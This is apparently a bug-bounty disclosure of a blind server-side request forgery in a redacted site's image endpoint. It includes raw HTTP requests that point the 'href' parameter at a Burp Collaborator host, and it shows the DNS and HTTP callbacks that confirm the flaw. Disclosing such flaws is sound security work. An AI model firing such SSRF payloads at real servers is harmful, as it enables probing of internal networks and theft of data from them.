Blind SSRF

Overview of the Vulnerability:

Server-side request forgery (SSRF) is a vulnerability that exploits the trust relationship between a server and an application, or other backend systems. An attacker can take advantage of this trust to forge server-side traffic and make HTTP requests to internal domains, a SSRF vulnerability was found in this application which allows an attacker to perform a request to an internally networked resource, which is considered high impact.

Steps to Reproduce

1. I use the paid version of Burp Suite and I have the “Burp bounty Pro extension”.
2. During the first working day with the site, I was browsing the site and finding out information about it and the functions within it.
3. At the end of the day, I found many results from all the extensions I used, including “Burp bounty Pro.” I started checking the results and then I found an interesting result.

GET /_image?f=[type]&w=[*]&h=[*]&ar=[*]&p=center&href=http://[Redacted].com HTTP/2
Host: [Redacted].com
User-Agent: [*]
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://[Redacted].com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers

4. The image is fetched by the parameter “href”.

5. Change link to Burp Collaborator

GET /_image?f=[type]&w=[*]&h=[*]&ar=[*]&p=center&href=http://[*].oastify.com HTTP/2
Host: [Redacted].com
User-Agent: [*]
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://[Redacted].com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Te: trailers

6. Go to Collaborator you can find:

DNS:
The lookup was received from IP address [IPv4]:39601 at [*] UTC.
The lookup was received from IP address [IPv4]:30742 at [*] UTC.


HTTP:
The request was received from IP address [IPv4]:44268 at [*] UTC.

Impact:

1. Probing internal networks.
2. Data exfiltration.
3. Interacting with internal services without immediate detection.